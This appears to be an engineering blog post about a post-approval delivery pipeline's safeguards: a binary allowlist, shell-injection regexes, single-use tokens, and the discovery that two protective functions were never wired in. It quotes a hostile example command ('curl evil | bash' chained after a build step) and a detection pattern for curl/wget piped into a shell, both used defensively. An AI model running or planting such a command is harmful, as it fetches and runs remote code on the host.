Five Verdicts and a Suspicion ended with the review pipeline handing approved tasks to a git merge queue. What it didn’t cover is what happens after the merge. Some projects have a post-approval command: a shell command that runs automatically when a task ships. Automated publishing. Build pipelines. The thing that makes the system useful instead of just correct.
The thing that was completely unprotected for weeks.
Six Binaries and a Regex
The allowlist is six entries:
export const ALLOWED_BINARIES = new Set(['npm', 'npx', 'node', 'make', 'docker', 'git'])
Six. That’s the entire vocabulary of commands the system is allowed to run after a human approves a task. Anything not on the list gets blocked before it reaches execFileSync. The binary is extracted from the command string, checked against the set, and rejected if it doesn’t match.
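The check itself is simple enough to sketch. This is an illustration, not the project's actual code — the post only says the binary is extracted from the command string, so the first-token extraction here is an assumption:

```typescript
// The six-entry allowlist, as shown in the post.
const ALLOWED_BINARIES = new Set(['npm', 'npx', 'node', 'make', 'docker', 'git'])

// Hypothetical sketch: take the first whitespace-delimited token as the
// binary and reject anything outside the allowlist before spawning.
function isAllowedBinary(command: string): boolean {
  const binary = command.trim().split(/\s+/)[0]
  return ALLOWED_BINARIES.has(binary)
}
```

Anything else — `rm`, `bash`, `python`, a path to an arbitrary executable — fails the check before `execFileSync` is ever reached.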
Then there’s a second layer, because the first one isn’t paranoid enough:
const DANGEROUS_ARG_PATTERN = /[|;&`$(){}\\><]|\$\(|`[^`]*`/
const DANGEROUS_COMMAND_PATTERN = /\b(curl|wget)\b.*\|\s*(ba)?sh/i
Shell metacharacters. Pipe chains. Backtick subshells. Command substitution. The system uses execFileSync which already avoids shell interpretation, but someone decided that wasn’t sufficient. If an agent stores npm run build; curl evil | bash in a project’s delivery config, the regex catches it before the process spawns.
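Combining the two patterns into a single screen might look like this — a minimal sketch, assuming both patterns are tested against the full command string (the helper name is made up for illustration):

```typescript
// The two patterns from the post.
const DANGEROUS_ARG_PATTERN = /[|;&`$(){}\\><]|\$\(|`[^`]*`/
const DANGEROUS_COMMAND_PATTERN = /\b(curl|wget)\b.*\|\s*(ba)?sh/i

// Hypothetical helper: true means the command is rejected before spawning.
function looksDangerous(command: string): boolean {
  return DANGEROUS_ARG_PATTERN.test(command) || DANGEROUS_COMMAND_PATTERN.test(command)
}
```

The stored payload from the example above trips both patterns at once: the `;` and `|` metacharacters hit the first, and the `curl … | bash` chain hits the second.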
Defense-in-depth. The technical term for “we trust nobody, including ourselves.”
The Authorization Gate
After the binary check, there’s a full authorization flow. Single-use tokens with a five-minute TTL:
Approval → Done (review pipeline)
  └─> createDeliveryAuthorization()
        ├─> Re-validates binary allowlist
        ├─> Fresh policy read (no cached values)
        ├─> Fresh spend cap check
        └─> Writes authorization row (immutable audit trail)
  └─> runPostApproveCommand() — only if auth succeeded
        └─> consumeDeliveryAuthorization() — token burned
The authorization function doesn’t trust the cache. It reads the content_release_policy directly from the database. It queries today’s execution spend against the cost guardian caps. It re-validates the binary allowlist even though the DB CHECK constraint already validated it at write time. Then it writes an authorization row: an immutable record of the policy state at the moment of delivery. If someone asks “why did this command run?” six months from now, the answer is in the database.
The token is single-use. consumeDeliveryAuthorization() marks it consumed after the command runs. If the command fails, the token is still consumed. No replays. No retries through the same authorization. You get one shot, and the system remembers whether you took it.
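The single-use semantics can be illustrated with a minimal in-memory sketch. The real system persists authorizations as database rows; the shapes and signatures here are assumptions made for the example:

```typescript
const DELIVERY_AUTHORIZATION_TTL_MS = 5 * 60 * 1000 // 5 minutes

interface DeliveryAuthorization {
  token: string
  createdAt: number
  consumed: boolean
}

// Stand-in for the authorization table.
const authorizations = new Map<string, DeliveryAuthorization>()

function createDeliveryAuthorization(token: string, now = Date.now()): void {
  authorizations.set(token, { token, createdAt: now, consumed: false })
}

// Fail closed: unknown, already-consumed, and expired tokens all return false.
function consumeDeliveryAuthorization(token: string, now = Date.now()): boolean {
  const auth = authorizations.get(token)
  if (!auth || auth.consumed) return false
  if (now - auth.createdAt > DELIVERY_AUTHORIZATION_TTL_MS) return false
  auth.consumed = true // burned even if the delivery command later fails
  return true
}
```

The design choice worth noticing is that every failure path returns false rather than throwing and leaving the token alive: a replay, a stale token, and a missing token all look identical to the caller.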
Every five minutes, the heartbeat sweeps expired unconsumed tokens. Orphaned authorizations that were created but never used get cleaned up instead of accumulating forever.
const DELIVERY_AUTHORIZATION_TTL_MS = 5 * 60 * 1000 // 5 minutes
Five minutes. The window between “I’ve decided this command is safe” and “the decision expires.” Long enough for the review worker to finish processing. Short enough that a stale authorization can’t be reused an hour later when conditions have changed.
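The sweep itself is a straightforward filter. A sketch, assuming rows keyed by token — note that consumed rows are deliberately kept, because they are the audit trail:

```typescript
const TTL_MS = 5 * 60 * 1000

type AuthRow = { token: string; createdAt: number; consumed: boolean }

// Delete unconsumed authorizations whose TTL has elapsed; return the count.
// The real sweep runs over database rows; this in-memory version is illustrative.
function cleanupExpiredDeliveryAuthorizations(rows: Map<string, AuthRow>, now = Date.now()): number {
  let removed = 0
  for (const [token, row] of rows) {
    if (!row.consumed && now - row.createdAt > TTL_MS) {
      rows.delete(token)
      removed++
    }
  }
  return removed
}
```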
The Part Where None of This Was Running
The security model above is clean. Layered. Audited. Fail-closed. The kind of thing you’d put in an architecture document and feel good about.
Here’s the problem: applyDeliveryConstraints() was defined in server/lib/delivery-constraints.ts. It was never called from server/index.ts. The DB CHECK constraint that enforces the binary allowlist at write time? The function that applies it existed. The startup sequence that invokes it didn’t.
cleanupExpiredDeliveryAuthorizations() was defined in server/lib/delivery.ts. It was never wired to the heartbeat. The sweep that cleans up orphaned tokens? Implemented. Scheduled? No.
The database migration had run. The schema was correct. The Prisma model existed. The logic was tested. The runtime never executed any of it.
Two functions. Both idempotent. Both safe. Both carefully written. Both sitting in modules that nothing imported.
The fix was three lines in the startup sequence and one heartbeat step.
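The shape of that wiring can be sketched with trivial stand-ins for the two real functions (which live in server/lib/delivery-constraints.ts and server/lib/delivery.ts). The bodies here are placeholders; the point is the call sites that were missing:

```typescript
// Records which of the two dead-code functions actually got invoked.
const calls: string[] = []

// Stand-in for the real applyDeliveryConstraints(): idempotent, safe on every boot.
function applyDeliveryConstraints(): void {
  calls.push('constraints')
}

// Stand-in for the real cleanupExpiredDeliveryAuthorizations().
function cleanupExpiredDeliveryAuthorizations(): void {
  calls.push('sweep')
}

// The startup invocation that was missing.
function startServer(): void {
  applyDeliveryConstraints()
}

// The heartbeat step that was never registered.
const heartbeatSteps: Array<() => void> = [cleanupExpiredDeliveryAuthorizations]
function heartbeatTick(): void {
  for (const step of heartbeatSteps) step()
}
```

Both functions were idempotent, so the fix carried no migration risk: calling them on every boot and every tick is exactly what they were written for.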
The Risk Assessment
The session notes for this fix contain a single line of risk assessment:
“None. Both functions were safe/idempotent before; they just weren’t being called.”
That’s the whole thing. The system wasn’t running delivery commands unsafely. It wasn’t running the protection for delivery commands. The vault was engineered, the locking mechanism was calibrated, the alarm was wired. The vault door was leaning against the wall because nobody hung it.
This is not a near-miss story. No commands executed without authorization. The delivery pipeline was gated by a separate policy check that did work, and by the operator’s manual approval flow. The security layers that were dead code were defense-in-depth layers: the second lock, the third check, the cleanup sweep.
But defense-in-depth only works if every layer is running. A single-use token that never gets created is the same as no token at all. A binary allowlist that exists in the schema but never gets enforced at write time is a comment, not a constraint.
What This Is Actually About
Eight Gates and a Loop documented a system where every gate exists because something broke. The delivery authorization gate exists because someone thought about what could break. The distinction matters: reactive gates are scars, proactive gates are insurance. Insurance that isn’t activated isn’t insurance. It’s a receipt for a policy you forgot to sign.
The system had six binaries in an allowlist. Two regex patterns for shell injection. A DB CHECK constraint. Single-use tokens with a five-minute TTL. A heartbeat sweep. An immutable audit trail. All of it correct. None of it connected.
Three lines of code to fix. That’s the distance between “designed” and “deployed.” Three lines, and the entire security model that someone carefully architected started doing its job.
The scariest bugs aren’t the ones that break things. They’re the ones that leave things exactly as they were, quietly, for weeks, while everyone assumes the protection is there because the code is there. Code is not protection. Running code is protection. The difference is an import statement.